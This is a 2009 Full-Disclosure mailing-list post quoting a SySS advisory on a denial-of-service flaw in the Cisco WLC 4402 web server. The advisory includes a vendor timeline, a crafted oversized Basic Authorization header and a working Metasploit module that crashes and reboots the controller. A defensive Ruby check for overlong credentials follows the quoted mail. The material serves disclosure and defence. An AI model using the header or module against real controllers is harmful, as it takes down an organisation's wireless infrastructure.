That was a crappy disclosure. Where is the .exe file with the GUI?

At least make it in Visual Basic so I can have an interface. Just send it to me in a zip, then it'll be useful to the intelligence community.

n3td3v / antisec

On Sun, 26 Jul 2009 09:17:52 -0500 SySS security advisories -- Christoph Bott <[email protected]> wrote:
>=======================================
>Vulnerable Product: Cisco WLC 4402 (most likely among many others)
>Vulnerability discovered: January 2009
>Reported to vendor: Jan 01, 2009
>Fix available: not yet
>=======================================
>
>
>TIMELINE:
>---------------------------------------------------
>+ 01/11/2009: discovered vulnerability on a customer's site
>
>+ 01/13/2009: initial vendor contact via [email protected]
>
>+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631
>
>+ 02/09/2009: vendor states that bugfix is _not_ contained within
>cisco-sa-20090204-wlc
>
>+ 03/30/2009: vendor states: "We have a fix for this issue. However,
>due to some other issues we are investigating we may not make this
>public until about 42 days."
>
>+ 06/02/2009: vendor states: "I really apologize for the delay on
>publishing this advisory. The reason that we have not publish is because
>we are also incorporating other security fixes within all the affected
>releases. We WILL be publishing the advisory on July 8th, 2009 at
>1600 UTC."
>
>+ 07/24/2009: Customer agreed with full disclosure
>
>+ 07/26/2009: Still no fixes available; full disclosure due to lacking
>vendor activities.
>
>
>
>PRODUCT:
>---------------------------------------------------
>The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via
>an integrated embedded webserver (emweb httpd).
>
>
>
>AFFECTED VERSIONS:
>---------------------------------------------------
>The vulnerability described below could be verified on WLC 4402,
>software release 5.1.151.0. However, since the vulnerability affects the
>integrated embedded emweb http daemon, several other products and/or
>software releases might be affected, too.
>
>
>
>VULNERABILITY:
>---------------------------------------------------
>Using long, random authentication data, the embedded web server can be
>crashed, which leads to a device reboot. Subsequently repeated requests
>lead to a permanent denial of service of the WLC (and therefore of the
>whole wireless infrastructure).
>
>
>
>EXPLOIT:
>---------------------------------------------------
>Not needed.
>
>One only has to call "/screens/frameset.html" and provide Basic
>Authentication data which uses a username and password longer than 63
>characters each.
>
>The following header worked for me:
>Authorization: Basic
>MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTA
>xMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NT
>Y3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0
>
>
>The following code snippet can be used as a module within the metasploit
>framework:
>
>---- snip -----
>require 'msf/core'
>
>
>class Metasploit3 < Msf::Auxiliary
>
>    include Msf::Exploit::Remote::Tcp
>    include Msf::Auxiliary::Dos
>
>    def initialize(info = {})
>        super(update_info(info,
>            'Name'           => 'Cisco WLC 4200 Basic Auth Denial of Service',
>            'Description'    => %q{
>                This module triggers a Denial of Service condition in the Cisco WLC 4200
>                HTTP server. By sending a GET request with long authentication data, the
>                device becomes unresponsive and reboots. Firmware is reportedly vulnerable.
>            },
>            'Author'         => [ 'Christoph Bott <msf[at]bott.syss.de>' ],
>            'License'        => MSF_LICENSE,
>            'Version'        => '$Revision: 5949 $',
>            'References'     =>
>                [
>                    [ 'BID', '???'],
>                    [ 'CVE', '???'],
>                    [ 'URL', 'http://www.cisco.com/?????'],
>                ],
>            'DisclosureDate' => 'January 26 2009'))
>
>        register_options(
>            [
>                Opt::RPORT(80),
>            ], self.class)
>
>    end
>
>    def run
>        connect
>
>        print_status("Sending HTTP DoS packet")
>
>        # The Basic token is the one quoted above, re-joined onto a single line
>        # so that the mail wrapping does not put newlines inside the header.
>        sploit =
>            "GET /screens/frameset.html HTTP/1.0\r\n" +
>            "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0"
>
>        sock.put(sploit + "\r\n")
>
>        disconnect
>    end
>
>end
>
>---- snip ----
>
>
>
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
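The advisory's trigger condition is simple enough to screen for in front of the controller: decode the Basic token and refuse anything whose user-id or password runs past 63 characters. The check below is an added example written for this thread (not SySS or Cisco code); the 63-character bound and the sample requests (the advisory's own header re-joined onto one line, plus a constructed normal login and a junk token) come from the advisory text above.

```ruby
require 'base64'

# Longest user-id / password the advisory says the emweb daemon copes with.
# Assumed from the advisory text ("longer than 63 characters each").
MAX_FIELD_LEN = 63

# Inspect one raw HTTP request and report on its Basic-Auth credential lengths.
# Returns { status: :ok | :overlong | :malformed | :none, user_len:, pass_len: }
# so a reverse proxy or IDS rule can drop :overlong requests before they reach
# the WLC's management interface.
def check_basic_auth(raw_request)
  header = raw_request.each_line.find { |l| l =~ /\AAuthorization:\s*Basic\s+/i }
  return { status: :none, user_len: 0, pass_len: 0 } unless header

  token = header.sub(/\AAuthorization:\s*Basic\s+/i, '').strip
  begin
    decoded = Base64.strict_decode64(token)   # rejects non-base64 junk
  rescue ArgumentError
    return { status: :malformed, user_len: 0, pass_len: 0 }
  end

  # Basic credentials are "user-id:password"; the user-id may not contain a
  # colon, so split on the first one only. No colon at all is malformed.
  user, sep, pass = decoded.partition(':')
  return { status: :malformed, user_len: user.length, pass_len: 0 } if sep.empty?

  status = (user.length > MAX_FIELD_LEN || pass.length > MAX_FIELD_LEN) ? :overlong : :ok
  { status: status, user_len: user.length, pass_len: pass.length }
end

# Constructed sample input: the advisory's header, a normal login, a junk token.
ADVISORY_REQUEST = "GET /screens/frameset.html HTTP/1.0\r\n" \
  "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0\r\n\r\n"
NORMAL_REQUEST = "GET /screens/frameset.html HTTP/1.0\r\n" \
  "Authorization: Basic #{Base64.strict_encode64('admin:Cisco123')}\r\n\r\n"
JUNK_REQUEST = "GET / HTTP/1.0\r\nAuthorization: Basic ****\r\n\r\n"

if __FILE__ == $0
  [ADVISORY_REQUEST, NORMAL_REQUEST, JUNK_REQUEST].each do |req|
    puts check_basic_auth(req).inspect
  end
end
```

Run against the advisory's header the decoded credential is 64 digits, a colon, and 64 digits, so the request is flagged :overlong; the same length rule can be expressed as a proxy or IDS signature on the decoded token.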
